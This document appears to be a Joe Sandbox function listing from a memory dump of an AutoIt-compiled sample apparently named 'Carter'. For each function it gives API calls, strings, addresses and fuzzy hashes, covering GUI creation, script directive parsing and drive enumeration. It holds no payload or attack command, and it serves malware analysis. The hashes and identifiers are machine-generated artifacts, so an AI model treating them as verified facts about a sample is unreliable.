DestroyWindow.USER32(00000000,?,?,?), ref: 00A830D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00ABC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ABC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ABCBDE

Part of subcall function 00A81F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A82412,?,00000000,?,?,?,?,00A81AA7,00000000,?), ref: 00A81F76

SendMessageW.USER32(?,00001053), ref: 00ABCC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ABCC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ABCC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ABCC53

Strings

0, xrefs: 00ABCA72

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b0ef2d8482f247ada9062d37245fd64cf29ddf8f585f3a9a000c1ca58165317b
Instruction ID: 2871afd0d1ea0291c86677ecf8450749538d34708276429bb49449e1a896046c
Opcode Fuzzy Hash: b0ef2d8482f247ada9062d37245fd64cf29ddf8f585f3a9a000c1ca58165317b
Instruction Fuzzy Hash: A6129C31604201EFDB25EF24C884FE9BBB9BF08721F548569E495CB262CB71ED81CB91

Function 00A927FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031

__wcsnicmp.LIBCMT ref: 00A9286A
__wcsnicmp.LIBCMT ref: 00A9287E
__wcsnicmp.LIBCMT ref: 00A92896
__wcsnicmp.LIBCMT ref: 00A928AE
__wcsnicmp.LIBCMT ref: 00A928C6
__wcsnicmp.LIBCMT ref: 00A928DE
__wcsnicmp.LIBCMT ref: 00A928F6
__wcsnicmp.LIBCMT ref: 00A9290A
__wcsnicmp.LIBCMT ref: 00A92948
__wcsnicmp.LIBCMT ref: 00A9295C
__wcsnicmp.LIBCMT ref: 00A92970
__wcsnicmp.LIBCMT ref: 00A92984

Strings

', xrefs: 00ACFB9F
#cs, xrefs: 00A92904, 00A92956
Unterminated group of comments, xrefs: 00ACFCFA
", xrefs: 00ACFB89
#include-once, xrefs: 00A928C0
#comments-start, xrefs: 00A928F0, 00A92942
#include, xrefs: 00A928D8
#requireadmin, xrefs: 00A92890
#ce, xrefs: 00A9297E
Cannot parse #include, xrefs: 00ACFCE5
Bad directive syntax error, xrefs: 00ACFBD3, 00ACFBF0
#pragma compile, xrefs: 00A92864
#comments-end, xrefs: 00A9296A
#OnAutoItStartRegister, xrefs: 00A928A8
#notrayicon, xrefs: 00A92878

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: a4f84a96eee2a793e4f660a9de55c6431e1977fea6382900dd086a948b13cff1
Instruction ID: c9b3b5182aaed591879e55c987b62cecb946e5c7a486a5ad104d1202b6b238b3
Opcode Fuzzy Hash: a4f84a96eee2a793e4f660a9de55c6431e1977fea6382900dd086a948b13cff1
Instruction Fuzzy Hash: 37A18931B00209BBCF24AF61DE92FAE37F9AF45B40F104069F905AB292EB719E51D750

Function 00AF7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00AF7BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AF7C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AF7CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AF7CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AF7D1D
GetClientRect.USER32(00000000,?), ref: 00AF7D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AF7D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AF7D7C
GetStockObject.GDI32(00000011), ref: 00AF7D8C
SelectObject.GDI32(00000000,00000000), ref: 00AF7D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AF7DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF7DA9
DeleteDC.GDI32(00000000), ref: 00AF7DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AF7DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00AF7DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AF7E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AF7E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00AF7E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AF7E85
GetStockObject.GDI32(00000011), ref: 00AF7E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AF7E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AF7EA5

Strings

DISPLAY, xrefs: 00AF7D72
AutoIt v3, xrefs: 00AF7D15
static, xrefs: 00AF7D67, 00AF7E7F
msctls_progress32, xrefs: 00AF7E26

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: e0f457c391cc9530bd42e596be0a835369e8b96f5c34284be5fce8249251012f
Instruction ID: 82f24ce6b36eb959efe7282ec7d40e0236b2b32ffa10f3af7059aa1028cd10d3
Opcode Fuzzy Hash: e0f457c391cc9530bd42e596be0a835369e8b96f5c34284be5fce8249251012f
Instruction Fuzzy Hash: D8A185B1A50219BFEB14DBA4DD4AFAE77B9EB05710F008114FA15A72E0DBB0AD41CF60

Function 00AEB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AEB361
GetDriveTypeW.KERNEL32(?,00B12C4C,?,\\.\,00B10980), ref: 00AEB43E
SetErrorMode.KERNEL32(00000000,00B12C4C,?,\\.\,00B10980), ref: 00AEB59C

Strings

USB, xrefs: 00AEB533
Fixed, xrefs: 00AEB486
1394, xrefs: 00AEB51E
SATA, xrefs: 00AEB54F
ATAPI, xrefs: 00AEB510
CDROM, xrefs: 00AEB472
Network, xrefs: 00AEB47C
Removable, xrefs: 00AEB490
PhysicalDrive, xrefs: 00AEB3EA
iSCSI, xrefs: 00AEB541
ATA, xrefs: 00AEB517
\\.\, xrefs: 00AEB3B3
Fibre, xrefs: 00AEB52C
RAMDisk, xrefs: 00AEB468
Virtual, xrefs: 00AEB564
SAS, xrefs: 00AEB548
FileBackedVirtual, xrefs: 00AEB56B
SCSI, xrefs: 00AEB509
MMC, xrefs: 00AEB55D
SSD, xrefs: 00AEB4C9
RAID, xrefs: 00AEB53A
SSA, xrefs: 00AEB525
Unknown, xrefs: 00AEB45E, 00AEB502

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: e5532da2fa1e258f21d99ab3df6d90dcf5f1bc30737dde0d6f6c3e073477345b
Instruction ID: 4f7a6a2a3d0ed308edb88c4479b17b6f605fa0690d9eebca24c13649feb0ee66
Opcode Fuzzy Hash: e5532da2fa1e258f21d99ab3df6d90dcf5f1bc30737dde0d6f6c3e073477345b
Instruction Fuzzy Hash: 81517430B6425AEBCB00EB62CA4AD7E77F0EB44740F344156E507A72A1DB71AE41CB71

Function 00B0A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B0A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B0A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00B0A1CC

Strings

0, xrefs: 00B0A209

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 61a5b68d2d3f00b51492db18d1e099f8fa2cb827c8922c9141d01fa732c2c807
Instruction ID: c5a6ccf8254d4483ff26d8247af4acff6fd3a5df90e037060b487a0fad2c2989
Opcode Fuzzy Hash: 61a5b68d2d3f00b51492db18d1e099f8fa2cb827c8922c9141d01fa732c2c807
Instruction Fuzzy Hash: 2E02BB30108301AFDB25CF14C888BAABFE5FF95714F048AA9F995972E1CB75D944CB92

Function 00B0AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B0AF51
SetTextColor.GDI32(?,?), ref: 00B0AF55
GetSysColorBrush.USER32(0000000F), ref: 00B0AF6B
GetSysColor.USER32(0000000F), ref: 00B0AF76
CreateSolidBrush.GDI32(?), ref: 00B0AF7B
GetSysColor.USER32(00000011), ref: 00B0AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0AFA1
SelectObject.GDI32(?,00000000), ref: 00B0AFB2
SetBkColor.GDI32(?,00000000), ref: 00B0AFBB
SelectObject.GDI32(?,?), ref: 00B0AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00B0AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00B0B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B0B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B0B086
InflateRect.USER32(?,000000FD,000000FD), ref: 00B0B0A4
DrawFocusRect.USER32(?,?), ref: 00B0B0AF
GetSysColor.USER32(00000011), ref: 00B0B0BD
SetTextColor.GDI32(?,00000000), ref: 00B0B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B0B0D9
SelectObject.GDI32(?,00B0AC1F), ref: 00B0B0F0
DeleteObject.GDI32(?), ref: 00B0B0FB
SelectObject.GDI32(?,?), ref: 00B0B101
DeleteObject.GDI32(?), ref: 00B0B106
SetTextColor.GDI32(?,?), ref: 00B0B10C
SetBkColor.GDI32(?,?), ref: 00B0B116

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 3f89b438cefc5e6d7bbc2e6ca12089aefcca59666e268d7795005a0a31f65620
Instruction ID: a7d4ce77543014a0b156f10b821ae3b76ec6ea42996faa239e4190f23a563527
Opcode Fuzzy Hash: 3f89b438cefc5e6d7bbc2e6ca12089aefcca59666e268d7795005a0a31f65620
Instruction Fuzzy Hash: C6613B71910219BFDB11AFA4DC48EEE7BB9EB08320F108555F915AB2E1DBB59980CF90

Function 00B08FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B090EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B090FB
CharNextW.USER32(0000014E), ref: 00B0912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B0916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B09181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B09192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B091AF
SetWindowTextW.USER32(?,0000014E), ref: 00B091FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B09211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B09242
_memset.LIBCMT ref: 00B09267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B092B0
_memset.LIBCMT ref: 00B0930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B09339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B09391
SendMessageW.USER32(?,0000133D,?,?), ref: 00B0943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00B09460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B094AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B094D7
DrawMenuBar.USER32(?), ref: 00B094E6
SetWindowTextW.USER32(?,0000014E), ref: 00B0950E

Strings

0, xrefs: 00B09478

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 994009b92f70d1eec0e8ab101fd6a2bd4c8eec7332bb53af73faf95aed00ee03
Instruction ID: 42463776398d9117926677a1a593c9c63de6cbc95298c955442971c0895fd75f
Opcode Fuzzy Hash: 994009b92f70d1eec0e8ab101fd6a2bd4c8eec7332bb53af73faf95aed00ee03
Instruction Fuzzy Hash: 2CE16C71904209AEDF219F55CC84EEE7FB8EF09710F508196F915AB2D2DB708A81DF61

Function 00B04ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B05007
GetDesktopWindow.USER32 ref: 00B0501C
GetWindowRect.USER32(00000000), ref: 00B05023
GetWindowLongW.USER32(?,000000F0), ref: 00B05085
DestroyWindow.USER32(?), ref: 00B050B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B050DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B050F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B0511E
SendMessageW.USER32(?,00000421,?,?), ref: 00B05133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B05146
IsWindowVisible.USER32(?), ref: 00B05166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B05181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B05195
GetWindowRect.USER32(?,?), ref: 00B051AD
MonitorFromPoint.USER32(?,?,00000002), ref: 00B051D3
GetMonitorInfoW.USER32(00000000,?), ref: 00B051ED
CopyRect.USER32(?,?), ref: 00B05204
SendMessageW.USER32(?,00000412,00000000), ref: 00B0526F

Strings

(, xrefs: 00B051E0
0, xrefs: 00B04FB2
tooltips_class32, xrefs: 00B050D3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: d72afd887108d59d8aaef0d00b9af28c0177d123599115896a29e8e091518db9
Instruction ID: f2f327beeb3e02acc94ff6c0bf0a2ccbf49ffdaf8419b5b9d171237cf54e2834
Opcode Fuzzy Hash: d72afd887108d59d8aaef0d00b9af28c0177d123599115896a29e8e091518db9
Instruction Fuzzy Hash: FCB18870604701AFD714EF64C988B6BBBE5FF88310F008A58F9999B291DB71E845CF92

Function 00AE498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AE499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AE49C2
_wcscpy.LIBCMT ref: 00AE49F0
_wcscmp.LIBCMT ref: 00AE49FB
_wcscat.LIBCMT ref: 00AE4A11
_wcsstr.LIBCMT ref: 00AE4A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AE4A38
_wcscat.LIBCMT ref: 00AE4A81
_wcscat.LIBCMT ref: 00AE4A88
_wcsncpy.LIBCMT ref: 00AE4AB3

Strings

DefaultLangCodepage, xrefs: 00AE4A9B
\VarFileInfo\Translation, xrefs: 00AE4A30
StringFileInfo\, xrefs: 00AE4A0B
04090000, xrefs: 00AE4A6E
%u.%u.%u.%u, xrefs: 00AE4B16

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: be70b539c353652ce3569bd00c7437813ef20c9570545f7e1b29f1d70d4c43fb
Instruction ID: 07258db11f5a74668cefa9ca15a40e9a4c9884e3bcb35f67affb2346eb44ca9d
Opcode Fuzzy Hash: be70b539c353652ce3569bd00c7437813ef20c9570545f7e1b29f1d70d4c43fb
Instruction Fuzzy Hash: 3D410472A002047EEB10B7658E47EBF7BBCEF46360F104069FA04A71D2EB74DA5197A5

Function 00A82BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82C8C
GetSystemMetrics.USER32(00000007), ref: 00A82C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A82CBF
GetSystemMetrics.USER32(00000008), ref: 00A82CC7
GetSystemMetrics.USER32(00000004), ref: 00A82CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A82D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A82D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A82D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A82D60
GetClientRect.USER32(00000000,000000FF), ref: 00A82D7E
GetStockObject.GDI32(00000011), ref: 00A82D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A82DA5

Part of subcall function 00A82714: GetCursorPos.USER32(?), ref: 00A82727
Part of subcall function 00A82714: ScreenToClient.USER32(00B477B0,?), ref: 00A82744
Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000001), ref: 00A82769
Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000002), ref: 00A82777

SetTimer.USER32(00000000,00000000,00000028,00A813C7), ref: 00A82DCC

Strings

AutoIt v3 GUI, xrefs: 00A82D44

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d5b8b280354c076375934a092bd438ce411d3a6b923f826e2c8f9ffbe12ca271
Instruction ID: c62c76d24a0beb02a17b3f8041106b8cd47ad28b1556bc0114204867606ebdb0
Opcode Fuzzy Hash: d5b8b280354c076375934a092bd438ce411d3a6b923f826e2c8f9ffbe12ca271
Instruction Fuzzy Hash: 8DB16C75A4020A9FDB14EFA8DD89BFD7BB5FB08310F108129FA15E7290DB74A950CB54

Function 00AA0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

GetForegroundWindow.USER32(00B10980,?,?,?,?,?), ref: 00AA04E3
IsWindow.USER32(?), ref: 00AD66BB

Strings

ACTIVE, xrefs: 00AD6488
REGEXPCLASS, xrefs: 00AD6506
REGEXPTITLE, xrefs: 00AD64B4
CLASS, xrefs: 00AD64E5
TITLE, xrefs: 00AD6650
INSTANCE, xrefs: 00AD65FA
ALL, xrefs: 00AD6622
LAST, xrefs: 00AD6472
HANDLE, xrefs: 00AD649E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 70f2f5ce8d2edf0e8ed4f39c15cd4905d900bbd5790fed434cd10b0627417510
Instruction ID: e9d9ac8b92305c3b7b74a858febd5e08d79130f78ffe99a490b832193449c4b4
Opcode Fuzzy Hash: 70f2f5ce8d2edf0e8ed4f39c15cd4905d900bbd5790fed434cd10b0627417510
Instruction Fuzzy Hash: 59D1B531204706DFCB08EF20C6819AABBF5BF55344F604A1AF496576A2DF30F999CB91

Function 00B0441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B044AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B0456C

Strings

SELECT, xrefs: 00B04606
ISSELECTED, xrefs: 00B04577
VIEWCHANGE, xrefs: 00B0472B
DESELECT, xrefs: 00B0465A
GETSELECTED, xrefs: 00B0469A
FINDITEM, xrefs: 00B046DF
GETITEMCOUNT, xrefs: 00B044DE
GETSELECTEDCOUNT, xrefs: 00B0454F
SELECTINVERT, xrefs: 00B0463C
SELECTCLEAR, xrefs: 00B045EB
SELECTALL, xrefs: 00B045D3
GETTEXT, xrefs: 00B04515
